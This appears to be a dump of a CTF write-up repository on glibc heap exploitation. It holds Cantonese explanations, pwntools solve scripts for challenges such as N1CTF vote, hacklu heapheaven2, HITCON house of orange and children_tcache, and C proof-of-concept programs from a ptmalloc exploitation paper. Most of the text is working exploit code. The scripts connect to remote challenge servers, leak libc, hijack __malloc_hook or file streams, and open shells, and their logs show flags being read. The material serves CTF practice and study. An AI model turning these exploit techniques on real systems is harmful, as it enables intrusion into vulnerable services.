| new(0x80,"D"*0x80)#3 88 | new(0x80,"E"*0x80)#4 89 | free(3) 90 | free(1) 91 | edit(0,0x90,("A"*0x80)+("D"*0x10)) 92 | 93 | r.sendline("1") 94 | r.recvuntil("DDDDDDDDDDDDDDDD") 95 | leak=r.recvuntil("\n") 96 | print leak 97 | print len(leak) 98 | leak=u64(leak[:-1].ljust(8,"\x00")) 99 | print "leaked heap :"+hex(leak) 100 | heapbase=leak-6608 101 | print "heapbase :"+hex(heapbase) 102 | #free(0) 103 | free(2) 104 | free(4) 105 | edit(0,0x90*8,"\x00"*0x90*8) 106 | 107 | free(0) 108 | 109 | new(0x80,"A"*0x80)#0 110 | new(0x80,"B"*0x80)#1 111 | new(0x80,"C"*0x80)#2 112 | new(0x80,"D"*0x80)#3 113 | new(0x80,"E"*0x80)#4 114 | free(3) 115 | free(1) 116 | 117 | #0x0000000006020A8 118 | atoi_got=0x0000000000602070 119 | known=heapbase+0x30 120 | fake_heap =p64(0)+p64(0x80)+p64(known-0x18)+p64(known-0x10)+"E"*0x60 121 | fake_heap+=p64(0x80) + p64(0x90) + 'F'*0x70 122 | edit(0,(0x80*2),fake_heap) 123 | free(1) 124 | pay = p64(2) + p64(1) + p64(0x100) + p64(known-0x18) 125 | pay += p64(1)+p64(0x8)+p64(atoi_got) 126 | pay += '\x00'*(0x100-len(pay)) 127 | 128 | #pause() 129 | edit(0,len(pay),pay) 130 | sleep(2) 131 | r.recvuntil(":") 132 | 133 | if local==0: 134 | r.sendline("1") 135 | r.recvuntil("1. ") 136 | leak=r.recvuntil("\n") 137 | print leak 138 | leak=u64(leak[:-1].ljust(8,"\x00")) 139 | print "leaked atoi :"+hex(leak) 140 | libc_base=leak-libc.symbols['atoi'] 141 | print "libc_base : "+hex(libc_base) 142 | system=libc_base+libc.symbols['system'] 143 | print "system : "+hex(system) 144 | 145 | 146 | edit(1,8,p64(system)) 147 | #pause() 148 | r.sendline("ls -al") 149 | r.interactive() 150 | 151 | #PCTF{Double_Fr33_free_Fr3e_Fre3_h4ve_Fun} 152 | -------------------------------------------------------------------------------- /heap/N1CTF_2018_vote/b8a4590d-9fee-4a34-8396-d63adac62a0d.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/heap/N1CTF_2018_vote/b8a4590d-9fee-4a34-8396-d63adac62a0d.zip -------------------------------------------------------------------------------- /heap/N1CTF_2018_vote/readme.md: -------------------------------------------------------------------------------- 1 | # vote 250(pwn) 2 | 3 | 題目: 4 | 5 | >hk node: nc 47.90.103.10 6000 6 | > 7 | >cn node: nc 47.97.190.1 6000 8 | > 9 | >(Two challenge servers are identical, use either of them.) 10 | > 11 | >[Download](b8a4590d-9fee-4a34-8396-d63adac62a0d.zip) 12 | 13 | 14 | menu: 15 | ``` 16 | 0: Create 17 | 1: Show 18 | 2: Vote 19 | 3: Result 20 | 4: Cancel 21 | 5: Exit 22 | Action: 23 | ``` 24 | 25 | 呢條係經典嘅 use-after-free 題目 26 | 27 | Create 嘅 code: 28 | 29 | ```C++ 30 | void sub_400D2C() 31 | { 32 | ........... 33 | for ( i = 0; i <= 15; ++i ) 34 | { 35 | if ( !*(&ptr + i) ) 36 | { 37 | sub_400C52(4199328LL); 38 | v2 = sub_400C90(4199328LL); 39 | if ( v2 > 0 && v2 <= 4096 ) 40 | { 41 | v0 = malloc(v2 + 16); 42 | *(_QWORD *)v0 = 0LL; 43 | .............. 44 | } 45 | ``` 46 | 47 | Cancel 嘅 code: 48 | 49 | ```C++ 50 | void sub_40109D() 51 | { 52 | char *v0; // rsi@8 53 | int v1; // [sp+Ch] [bp-4h]@1 54 | 55 | sub_400C52("Please enter the index: "); 56 | v1 = sub_400C90("Please enter the index: "); 57 | if ( v1 >= 0 && v1 <= 15 && *(&ptr + v1) ) 58 | { 59 | if ( --qword_602180[v1] == --*(_QWORD *)*(&ptr + v1) ) 60 | { 61 | if ( qword_602180[v1] < 0 ) 62 | free(*(&ptr + v1)); 63 | } 64 | else if ( qword_602180[v1] < 0 ) 65 | { 66 | v0 = (char *)*(&ptr + dword_602160) + 16; 67 | printf("%s", v0); 68 | fflush(stdout); 69 | sub_400C00(" has freed", v0); 70 | free(*(&ptr + v1)); 71 | *(&ptr + v1) = 0LL; 72 | } 73 | } 74 | } 75 | ``` 76 | 77 | 個bug就係free 之後冇清返ptr array 相應entry做0,引致UAF 78 | 79 | 有一個注意位就係,如果我request 0x20 name size, 實際會return 0x40 嘅object(冇睇清楚ida code嘅後果.........) 80 | 81 | 之後就係基本套路 leak libc-> fastbin attack -> get shell 82 | 83 | 84 | 不過由於冇得直接edit, 所以有好多error chk 要bypass ..... 85 | 86 | 87 | 當leak完 libc, trigger consolidation之後, malloc 一個大少少嘅chunk 覆蓋晒之前個d chunk 嘅address 88 | 89 | 之後再寫假嘅meta data 去上一手memory address 相應嘅位置 (error chk bypass eg 前後位size 要match ) 90 | 91 | 再free 返chunk 0 防止再malloc 個陣trigger heap inside freed heap error 92 | 93 | 94 | 95 | 之後malloc一個0x50(0x70) 拎左最頂塊chunk,再malloc 一個0x50(0x70) fastbin 就可以有arbitary writing... 96 | 97 | ```python 98 | create("qqqq",0x50) 99 | create("A"*3+p64(rce)*4,0x50) 100 | print "[+]get shell :)" 101 | r.sendline("0") 102 | sleep(1) 103 | #triger one gadget 104 | r.sendline("4000") 105 | r.sendline("$0") 106 | r.sendline("ls -al") 107 | r.interactive() 108 | ``` 109 | 110 | # Solution 111 | 112 | 113 | solution: [solve.py](solve.py) 114 | 115 | ``` 116 | # [*] '/root/Desktop/CTF_Game/n1ctf_2018/vote/libc-2.23.so' 117 | # Arch: amd64-64-little 118 | # RELRO: Partial RELRO 119 | # Stack: Canary found 120 | # NX: NX enabled 121 | # PIE: PIE enabled 122 | # [*] Paused (press any to continue) 123 | # 139870119717752 124 | 125 | # 0x7f360ccceb78 126 | # leaked libc =0x7f360c90a000 127 | # malloc_hook = 0x7f360ccceb10 128 | # one = 0x7f360c9fa274 129 | # [+]get shell :) 130 | # [*] Switching to interactive mode 131 | # Please enter the name's size: total 36 132 | # dr-xr-xr-x 2 pwn pwn 4096 Mar 10 18:38 . 133 | # drwxr-xr-x 3 root root 4096 Mar 8 15:28 .. 134 | # -rw-r--r-- 1 pwn pwn 220 Mar 8 15:28 .bash_logout 135 | # -rw-r--r-- 1 pwn pwn 3771 Mar 8 15:28 .bashrc 136 | # -rw-r--r-- 1 pwn pwn 655 Mar 8 15:28 .profile 137 | # -rw-r--r-- 1 root root 26 Mar 9 11:12 flag 138 | # -rwxr-xr-x 1 root root 10544 Mar 8 15:29 vote 139 | # $ cat flag 140 | # N1CTF{Pr1nTf_2333333333!} 141 | # $ 142 | 143 | ``` 144 | -------------------------------------------------------------------------------- /heap/N1CTF_2018_vote/solve.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | LOCAL=0 4 | 5 | if LOCAL: 6 | #0x3f2d6 7 | #0xd67cf 8 | #0x3f32a 9 | r=process('./vote') 10 | libc=ELF("libc-2.24_64.so") 11 | gdb.attach(r) 12 | malloc_diff=-3268136 13 | one=0x3f2d6 14 | else: 15 | #0x45216 16 | #0x4526a 17 | #0xf0274 18 | #0xf1117 19 | #r=process('./vote',env={"LD_PRELOAD": "./libc-2.23.so"}) 20 | #gdb.attach(r) 21 | host="47.90.103.10" 22 | port=6000 23 | r = remote(host,port) 24 | libc=ELF("libc-2.23.so") 25 | malloc_diff=-3410504 26 | one=0xf0274 27 | 28 | 29 | pause() 30 | 31 | def create(content,size): 32 | r.sendline("0") 33 | r.recvuntil(": ") 34 | r.sendline(str(size)) 35 | r.recvuntil(": ") 36 | r.sendline(content) 37 | r.recvuntil("Action: ") 38 | 39 | def show(idx): 40 | r.sendline("1") 41 | r.recvuntil(": ") 42 | r.sendline(str(idx)) 43 | r.recvuntil("count: ") 44 | leak=r.recvuntil("\n") 45 | print leak 46 | leak=int(leak[:-1]) 47 | print hex(leak) 48 | r.recvuntil("Action: ") 49 | return leak 50 | 51 | def vote(idx): 52 | r.sendline("2") 53 | r.recvuntil(": ") 54 | r.sendline(str(idx)) 55 | r.recvuntil("Action: ") 56 | 57 | def cancel(idx): 58 | r.sendline("4") 59 | r.recvuntil(": ") 60 | r.sendline(str(idx)) 61 | r.recvuntil("Action: ") 62 | 63 | 64 | 65 | 66 | 67 | r.recvuntil("Action: ") 68 | create("AAAAAAAA",0x100) 69 | create("BBBBBBBB",0x50)#32 70 | create("CCCCCCCC",0x100) 71 | create("BBBBBBBB",0x50)#32 72 | 73 | cancel(0) 74 | leakk=show(0) 75 | mallocc=leakk+malloc_diff 76 | libc_base=mallocc-libc.symbols['malloc'] 77 | print "leaked libc ="+ hex(libc_base) 78 | malloc_hook=libc_base+libc.symbols['__malloc_hook'] 79 | print "malloc_hook = "+hex(malloc_hook) 80 | rce=libc_base+one 81 | print "one = "+hex(rce) 82 | #clean heap 83 | cancel(1) 84 | cancel(2) 85 | cancel(3) 86 | #pause() 87 | create("R"*0x100+p64(0x100)+p64(0x71)+p64(malloc_hook-35),0x500) #new 0 88 | 89 | #UAF 90 | cancel(1) 91 | #added to smallbin to bypass checking 92 | cancel(0) 93 | create("R"*0x100+p64(0x100)+p64(0x71)+p64(malloc_hook-35),0x300) #new 0 94 | 95 | create("qqqq",0x50) 96 | create("A"*3+p64(rce)*4,0x50) 97 | print "[+]get shell :)" 98 | r.sendline("0") 99 | sleep(1) 100 | #triger one gadget 101 | r.sendline("4000") 102 | r.sendline("$0") 103 | r.sendline("ls -al") 104 | r.interactive() 105 | 106 | 107 | # [*] '/root/Desktop/CTF_Game/n1ctf_2018/vote/libc-2.23.so' 108 | # Arch: amd64-64-little 109 | # RELRO: Partial RELRO 110 | # Stack: Canary found 111 | # NX: NX enabled 112 | # PIE: PIE enabled 113 | # [*] Paused (press any to continue) 114 | # 139870119717752 115 | 116 | # 0x7f360ccceb78 117 | # leaked libc =0x7f360c90a000 118 | # malloc_hook = 0x7f360ccceb10 119 | # one = 0x7f360c9fa274 120 | # [+]get shell :) 121 | # [*] Switching to interactive mode 122 | # Please enter the name's size: total 36 123 | # dr-xr-xr-x 2 pwn pwn 4096 Mar 10 18:38 . 124 | # drwxr-xr-x 3 root root 4096 Mar 8 15:28 .. 125 | # -rw-r--r-- 1 pwn pwn 220 Mar 8 15:28 .bash_logout 126 | # -rw-r--r-- 1 pwn pwn 3771 Mar 8 15:28 .bashrc 127 | # -rw-r--r-- 1 pwn pwn 655 Mar 8 15:28 .profile 128 | # -rw-r--r-- 1 root root 26 Mar 9 11:12 flag 129 | # -rwxr-xr-x 1 root root 10544 Mar 8 15:29 vote 130 | # $ cat flag 131 | # N1CTF{Pr1nTf_2333333333!} 132 | # $ 133 | -------------------------------------------------------------------------------- /heap/POC2018_theori_speedrun/solve.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | #c4n_i_j0in_theori? 4 | #r=process("speedypwn_c743765c8f6d2fcfc0eabde9315f4a9b") 5 | r=remote("speedhack-pwn-13935cd1502a01e8890ec92ac920528c.theori.io",8171) 6 | r.recvuntil(">") 7 | 8 | 9 | r.sendline(str(1)) 10 | r.sendline("FUCK") 11 | 12 | r.recvuntil(">") 13 | r.sendline(str(2)) 14 | r.recvuntil(">") 15 | r.sendline(str(3)) 16 | sleep(1) 17 | r.sendline(str(16)) 18 | sleep(2) 19 | r.send(p64(0x41DEBF43)+p64(0x0000000000400837^0x213141516171)) 20 | r.sendline(str(1)) 21 | r.interactive() 22 | -------------------------------------------------------------------------------- /heap/POC2018_theori_speedrun/speedypwn_c743765c8f6d2fcfc0eabde9315f4a9b: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/heap/POC2018_theori_speedrun/speedypwn_c743765c8f6d2fcfc0eabde9315f4a9b -------------------------------------------------------------------------------- /heap/hacklu_2018_heapheaven2/heap_heaven_2_4ea0c03fca366bef52322a964fc62325.zip: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/heap/hacklu_2018_heapheaven2/heap_heaven_2_4ea0c03fca366bef52322a964fc62325.zip -------------------------------------------------------------------------------- /heap/hacklu_2018_heapheaven2/solve.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | #r=process("./heap_heaven_2",env={"LD_PRELOAD": "./libc.so.6"}) 4 | #pause()# 5 | r=connect("arcade.fluxfingers.net",1809) 6 | r.recvuntil("exit\n") 7 | #libc=ELF("./libc.so.6") 8 | libc=ELF("./libc.so.6") 9 | def write(content,offset): 10 | r.sendline("1") 11 | r.recvuntil("?") 12 | r.sendline(str(len(content))) 13 | r.recvuntil("?") 14 | r.sendline(str(offset)) 15 | r.send(content) 16 | r.recvuntil("exit\n") 17 | 18 | def free(offset): 19 | r.sendline("3") 20 | r.recvuntil("?") 21 | r.sendline(str(offset)) 22 | r.recvuntil("exit\n") 23 | 24 | def leak(offset): 25 | r.sendline("4") 26 | r.recvuntil("?\n") 27 | r.sendline(str(offset)) 28 | leakage=r.recvuntil("\n") 29 | # print leakage 30 | leakage=u64(leakage[:-1].ljust(8,"\x00")) 31 | # print hex(leakage) 32 | r.recvuntil("exit\n") 33 | return leakage 34 | 35 | 36 | #chunk 1 37 | write(p64(0)+p64(0x91),0x0) 38 | write("AAAAAAAA",0x10) 39 | #chunk 2 40 | write(p64(0)+p64(0x91),0x90) 41 | write("BBBBBBBB",0xa0) 42 | 43 | #chunk 3 44 | write(p64(0)+p64(0x91),0x120) 45 | write("CCCCCCCC",0x130) 46 | 47 | #chunk 4 48 | write(p64(0)+p64(0x91),0x1b0) 49 | write("DDDDDDDD",0x1c0) 50 | 51 | #chunk 5 52 | write(p64(0)+p64(0x91),0x240) 53 | write("EEEEEEEE",0x250) 54 | 55 | #chunk 6 56 | write(p64(0)+p64(0x91),0x2d0) 57 | write("FFFFFFFF",0x2e0) 58 | 59 | #chunk 7 60 | write(p64(0)+p64(0x91),0x360) 61 | write("GGGGGGGG",0x370) 62 | 63 | #chunk 8 64 | write(p64(0)+p64(0x91),0x3f0) 65 | write("HHHHHHHH",0x400) 66 | 67 | #chunk 9 68 | write(p64(0)+p64(0x91),0x480) 69 | write("IIIIIIII",0x490) 70 | 71 | write(p64(0)+p64(0x20ff1),0x510) 72 | 73 | #finish 0x90 tcache 74 | for i in range(7): 75 | free(0x10+(i*0x90)) 76 | 77 | free(304) 78 | #real heap 79 | heap_leak=leak(304) 80 | #libc 81 | #fix the null byte 82 | write("\x41",304) 83 | libc_leak=leak(448)-0x41 84 | write("\x00",304) 85 | #mmap 86 | mmap_leak=leak(592) 87 | 88 | #log.info("heap leak : "+hex(heap_leak)) 89 | #log.info("libc leak : "+hex(libc_leak)) 90 | #log.info("mmap leak : "+hex(mmap_leak)) 91 | 92 | heap_base = heap_leak - 0x290 93 | libc_base = libc_leak - 1829632 94 | mmap_base = mmap_leak - 0x130 95 | 96 | log.info("heap base : "+hex(heap_base)) 97 | log.info("libc base : "+hex(libc_base)) 98 | log.info("mmap base : "+hex(mmap_base)) 99 | 100 | #make it point to menu 101 | #and leak it out 102 | code_base_container = heap_base +648 103 | #print hex(code_base_container) 104 | write(p64(code_base_container),304-0x90) 105 | write(p64(mmap_base+0xa0),304) 106 | code_base =leak(160)-0x1683 107 | mmap_size = code_base+0x00000004010 108 | log.info("code base : "+hex(code_base)) 109 | log.info("mmap_size : "+hex(mmap_size)) 110 | log.info("vtable : "+str(heap_base+0x260-mmap_base)) 111 | 112 | write(p64(0)+p64(0x21),0x510) 113 | write(p64(0)+p64(0x20ff1),0x530) 114 | 115 | free(0x520) 116 | write(p64(libc_base+0xe75f0)*2,0x520) 117 | r.sendline("3") 118 | r.sendline(str(heap_base+0x260-mmap_base)) 119 | sleep(1) 120 | r.sendline("ls -al") 121 | r.interactive() 122 | 123 | 124 | #At which offset do you want to free? 125 | #\x89��Fc: cannot set terminal process group (5855): Inappropriate ioctl for device 126 | #\x89��Fc: no job control in this shell 127 | #[chall@hacklu18 ~]$ total 32 128 | #drwxr-s--- 2 root chall 4096 Oct 13 22:50 . 129 | #drwxr-xr-x 3 root root 4096 Oct 9 16:16 .. 130 | #-r--r----- 1 root chall 43 Oct 13 22:52 flag 131 | #-rwxr-sr-x 1 root chall 17304 Oct 13 22:50 heap_heaven_2 132 | #[chall@hacklu18 ~]$ $ cat flag 133 | #flag{th1s_w4s_still_ez_h3ap_stuff_r1ght?!} 134 | #[chall@hacklu18 ~]$ exit 135 | #[*] Got EOF while reading in interactive 136 | -------------------------------------------------------------------------------- /heap/hitcon2016_house_of_orange/houseoforange_22785bece84189e632567da38e4be0e0c4bb1682: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/heap/hitcon2016_house_of_orange/houseoforange_22785bece84189e632567da38e4be0e0c4bb1682 -------------------------------------------------------------------------------- /heap/hitcon2016_house_of_orange/libc.so.6_375198810bb39e6593a968fcbcf6556789026743: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/heap/hitcon2016_house_of_orange/libc.so.6_375198810bb39e6593a968fcbcf6556789026743 -------------------------------------------------------------------------------- /heap/hitcon2016_house_of_orange/solve.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | 4 | #http://tacxingxing.com/2018/01/10/house-of-orange/ 5 | libc=ELF("libc.so.6_375198810bb39e6593a968fcbcf6556789026743") 6 | #libc=ELF("/lib/x86_64-linux-gnu/libc-2.23.so") 7 | r=process('./houseoforange_22785bece84189e632567da38e4be0e0c4bb1682',env={"LD_PRELOAD": "./libc.so.6_375198810bb39e6593a968fcbcf6556789026743"}) 8 | #r=process('./houseoforange_22785bece84189e632567da38e4be0e0c4bb1682') 9 | pause() 10 | 11 | def build(size,payload,price,color): 12 | r.sendline("1") 13 | r.recvuntil("name :") 14 | r.sendline(str(size)) 15 | r.recvuntil(" :") 16 | r.send(payload) 17 | r.recvuntil(":") 18 | r.sendline(str(price)) 19 | r.recvuntil(":") 20 | r.sendline(str(color)) 21 | r.recvuntil(" : ") 22 | 23 | def upgrade(size,payload,price,color): 24 | r.sendline("3") 25 | r.recvuntil("name :") 26 | r.sendline(str(size)) 27 | r.recvuntil(":") 28 | r.send(payload) 29 | r.recvuntil(":") 30 | r.sendline(str(price)) 31 | r.recvuntil(":") 32 | r.sendline(str(color)) 33 | r.recvuntil(" : ") 34 | 35 | 36 | r.recvuntil(" : ") 37 | 38 | build(0x80,"AAAAAAAA",1000,1) 39 | 40 | payload="Q"*168+p64(0xf31) 41 | upgrade(len(payload),payload,2000,2) 42 | pause() 43 | log.info("Malloc large chunk to trigger sysmalloc from mmap") 44 | build(0x10000,"ZZZZZZZZ",1,1) 45 | pause() 46 | log.info("leaking") 47 | log.info("build a 0x400 for leaking libc and heap ptr, due to large chunk features") 48 | build(0x500,"BBBBBBBB",1,1) 49 | sleep(0.1) 50 | r.sendline("2") 51 | r.recvuntil("BBBBBBBB") 52 | leak=r.recvuntil("\n") 53 | libc_leak= u64(leak[:-1].ljust(8,"\x00")) 54 | log.info("libc leak : "+hex(libc_leak)) 55 | 56 | upgrade(0x500,"B"*16,2000,2) 57 | r.sendline("2") 58 | r.recvuntil("B"*16) 59 | leak=r.recvuntil("\n") 60 | heap=u64(leak[:-1].ljust(8,"\x00"))-0x130 61 | 62 | malloc = libc_leak -(0x7f5180292188-0x7f51802b0f00) 63 | 64 | libc_base= malloc- (0x7f1b214a5f00 - 0x7f1b210c3000) 65 | io_list_all = libc_base + libc.symbols['_IO_list_all'] 66 | log.info("io_list_all : "+hex(io_list_all)) 67 | 68 | log.info("heap : "+hex(heap)) 69 | log.info("malloc : "+hex(malloc)) 70 | log.info("libc base : "+hex(libc_base)) 71 | log.info("_IO_list_all : "+hex(io_list_all)) 72 | log.info("malloc_hook : "+hex(libc_base+libc.symbols['__malloc_hook'])) 73 | log.info("system : "+hex(libc_base+libc.symbols['system'])) 74 | log.info("start fsop") 75 | #old region 76 | payload="X"*0x500 77 | 78 | #overflow region 79 | payload+=p64(0x0)+p64(0x21) # works for 0x0 ,0x21 80 | payload+="Q"*16 #garbage 81 | 82 | fs = "/bin/sh\x00"+ p64(0x61) #fake file stream 83 | fs += p64(0)+p64(io_list_all-0x10) #do unsorted bin attack fd bk pointer 84 | fs += p64(0)+p64(1) 85 | fs = fs.ljust(0xc0,"\x00") 86 | fs +=p64(0) 87 | 88 | payload+=fs 89 | payload+= p64(0)*2 90 | payload+= p64(heap+0x740) # pointing to the vtable 91 | payload+= p64(0)*3 #vtable for error 92 | payload+=p64(libc_base+libc.symbols['system']) 93 | upgrade(0x900,payload,2000,2) 94 | log.info("After this pause will get shell") 95 | pause() 96 | r.sendline("1") 97 | r.sendline("ls -al") 98 | r.interactive() 99 | -------------------------------------------------------------------------------- /heap/hitcon2018_children_tcache/children_tcache-d737eac1ffe293ffe697bffc692a1280.tar.gz: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/heap/hitcon2018_children_tcache/children_tcache-d737eac1ffe293ffe697bffc692a1280.tar.gz -------------------------------------------------------------------------------- /heap/hitcon2018_children_tcache/solve.py: -------------------------------------------------------------------------------- 1 | from pwn import * 2 | 3 | #r=process("./children_tcache") 4 | r=connect("54.178.132.125",8763) 5 | libc=ELF("./libc.so.6") 6 | #pause() 7 | def alloc(size,content): 8 | r.sendline("1") 9 | r.recvuntil(":") 10 | r.sendline(str(size)) 11 | r.recvuntil(":") 12 | r.send(content) 13 | r.recvuntil(": ") 14 | 15 | 16 | def free(id): 17 | r.sendline("3") 18 | r.recvuntil(":") 19 | r.sendline(str(id)) 20 | r.recvuntil(": ") 21 | 22 | 23 | r.recvuntil(":") 24 | 25 | alloc(0x450,"A"*8)#0 26 | alloc(0x70,"B"*8)#1 27 | alloc(0x600-0x10,"C"*8)#2 28 | alloc(0x40,"D"*8)#3 pad 29 | 30 | free(1) #put to tcache first 31 | free(0) 32 | 33 | #clean the 0xda 34 | for i in range(9): 35 | alloc(0x78-i,"q"*(0x78-i))#0 36 | free(0) 37 | alloc(0x78,"q"*0x70+p64(0x460+0x80))#0 38 | 39 | free(2) 40 | 41 | alloc(0x450,"x")#1 42 | 43 | alloc(0x620,"freeme")#0 and #2 is point to freeme as well 44 | 45 | free(0) 46 | r.sendline("2") 47 | r.recvuntil(":") 48 | r.sendline("2") 49 | leak= r.recvuntil("\n") 50 | leak=(u64(leak[:-1].ljust(8,"\x00"))) 51 | print hex(leak) 52 | r.recvuntil(": ") 53 | libc_base = leak-(0x7f092ae27ca0-0x00007f092aa3c000) 54 | malloc_hook = libc_base+libc.sym["__malloc_hook"] 55 | 56 | print(hex(malloc_hook)) 57 | one=libc_base+0x4f322 58 | print(hex(one)) 59 | alloc(0x60,"MALLOC") 60 | #now 0 and 2 is pointed to MALLOC 61 | free(0) 62 | free(2) 63 | alloc(0x60,p64(malloc_hook)) 64 | alloc(0x60,"x") 65 | alloc(0x60,p64(one)) 66 | sleep(1) 67 | r.sendline("1") 68 | r.sendline("100") 69 | sleep(2) 70 | r.sendline("ls -al") 71 | 72 | r.interactive() 73 | #hitcon{l4st_rem41nd3r_1s_v3ry_us3ful} 74 | -------------------------------------------------------------------------------- /heap/note/New-Exploit-Methods-against-Ptmalloc-of-GLIBC/consol_poc1.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | int main() 6 | { 7 | void *V = malloc(0x18); // vulnerable object 8 | void *A = malloc(0xf0); // chunk size 0x100, not fastbin 9 | char *T = (char*)malloc(0x10); // target 10 | void *B = malloc(0xf0); // chunk size 0x100, not fastbin 11 | strcpy(T, "Target"); 12 | printf("T: %s\n", T); 13 | free(B); 14 | memcpy(V, "AAAAAAAAAAAAAAAAAAAAAAAA\x21",0x19); // off-by-one, enlarge sizeof A to 0x120 15 | free(A); // force nonadjacent consolidation with B 16 | char *C = (char*)malloc(0x110); // malloc C, overlapping T 17 | strcpy(C+0x100, "Corrupted!"); 18 | printf("T: %s\n", T); 19 | return 0; 20 | } 21 | -------------------------------------------------------------------------------- /heap/note/New-Exploit-Methods-against-Ptmalloc-of-GLIBC/consol_poc2.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | int main() 6 | { 7 | void *A = malloc(0xf0); // chunk size 0x100, not fastbin 8 | char *T = (char*)malloc(0x10); // target 9 | void *V = malloc(0x18); // vulnerable object 10 | void *B = malloc(0xf0); // chunk size 0x100, not fastbin 11 | strcpy(T, "Target"); 12 | printf("T: %s\n", T); 13 | free(A); 14 | memcpy(V, "AAAAAAAAAAAAAAAA\x40\x01\x00\x00\x00\x00\x00\x00\x00", 0x19); //null byte off by 1, clear prev_inuse of B and set prev_size to 0x140 15 | free(B); // force nonadjacent consolidation with A 16 | char *C = (char*)malloc(0x110); // malloc C, overlapping T 17 | strcpy(C+0x100, "Corrupted!"); 18 | printf("T: %s\n", T); 19 | return 0; 20 | } 21 | -------------------------------------------------------------------------------- /heap/note/New-Exploit-Methods-against-Ptmalloc-of-GLIBC/enlarge_infoleak_poc.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | int main(){ 6 | 7 | void *H = malloc(0x80); 8 | void *V = malloc(0x18); // vulnerable object 9 | void *A = malloc(0xf0); // chunk size 0x100, not fastbin 10 | long *T = (long*)malloc(0x10); // target 11 | T[0] = 0x1234567890abcdef; 12 | T[1] = 0xdeadbeaf; 13 | printf("T: %lx %lx\n", T[0], T[1]); 14 | free(A); 15 | memcpy(V, "AAAAAAAAAAAAAAAAAAAAAAAA\x21",0x19); // off-by-one, enlarge sizeof A to 0x120 16 | void *B = malloc(0xf0); // malloc B,split A 17 | free(H); // insert one more chunk into unsorted bin 18 | printf("T: %lx %lx\n", T[0], T[1]); 19 | long libc_base = T[0] - 0x3c3b78; 20 | long heap_base = T[1]; 21 | printf("Base Address of Libc: %lx\n",libc_base); 22 | printf("Base Address of Heap: %lx\n",heap_base); 23 | return 0; 24 | } 25 | -------------------------------------------------------------------------------- /heap/note/New-Exploit-Methods-against-Ptmalloc-of-GLIBC/enlarge_poc.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | 5 | int main(){ 6 | 7 | void *V = malloc(0x18); // vulnerable object 8 | void *A = malloc(0xf0); // chunk size 0x100, not fastbin 9 | char *T = (char*)malloc(0x10); // target 10 | strcpy(T, "Target"); 11 | printf("T: %s\n", T); 12 | free(A); 13 | memcpy(V, "AAAAAAAAAAAAAAAAAAAAAAAA\x21",0x19); // off-by-one, enlarge sizeof A to 0x120 14 | char *B = (char*)malloc(0x110); //malloc B overlapping T 15 | strcpy(B+0x100, "Corrupted!"); // corrupt T 16 | printf("T: %s\n", T); 17 | return 0; 18 | } 19 | -------------------------------------------------------------------------------- /heap/note/New-Exploit-Methods-against-Ptmalloc-of-GLIBC/image/04_01.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/heap/note/New-Exploit-Methods-against-Ptmalloc-of-GLIBC/image/04_01.png -------------------------------------------------------------------------------- /heap/note/New-Exploit-Methods-against-Ptmalloc-of-GLIBC/image/04_02.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/heap/note/New-Exploit-Methods-against-Ptmalloc-of-GLIBC/image/04_02.png -------------------------------------------------------------------------------- /heap/note/New-Exploit-Methods-against-Ptmalloc-of-GLIBC/image/04_03.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/heap/note/New-Exploit-Methods-against-Ptmalloc-of-GLIBC/image/04_03.png -------------------------------------------------------------------------------- /heap/note/New-Exploit-Methods-against-Ptmalloc-of-GLIBC/image/04_04.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/heap/note/New-Exploit-Methods-against-Ptmalloc-of-GLIBC/image/04_04.png -------------------------------------------------------------------------------- /heap/note/New-Exploit-Methods-against-Ptmalloc-of-GLIBC/image/04_05.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/wwkenwong/CTF-Writeup/d69f4b609c3178b5df6f4a8d4287f29a0db826ad/heap/note/New-Exploit-Methods-against-Ptmalloc-of-GLIBC/image/04_05.png -------------------------------------------------------------------------------- /heap/note/New-Exploit-Methods-against-Ptmalloc-of-GLIBC/image/readme.md: -------------------------------------------------------------------------------- 1 | 2 | -------------------------------------------------------------------------------- /heap/note/New-Exploit-Methods-against-Ptmalloc-of-GLIBC/readme.md: -------------------------------------------------------------------------------- 1 | # New Exploit Methods against Ptmalloc of GLIBC 2 | 3 | The code and content is obtained from [New Exploit Methods against Ptmalloc of GLIBC](http://ieeexplore.ieee.org/document/7847004/) 4 | 5 | This repo is the note I made while read through the paper and run the examples with GDB. 6 | 7 | To compile as the example on the paper, we can 8 | 9 | ```C++ 10 | gcc *.c -fpie -pie 11 | ``` 12 | 13 | From the paper: 14 | 15 | The object V represents the vulnerable object and 16 | the object T represents the hypothesized target object. We 17 | prove the success of attack by corrupting the contents of T. 18 | 19 | # Code 4: 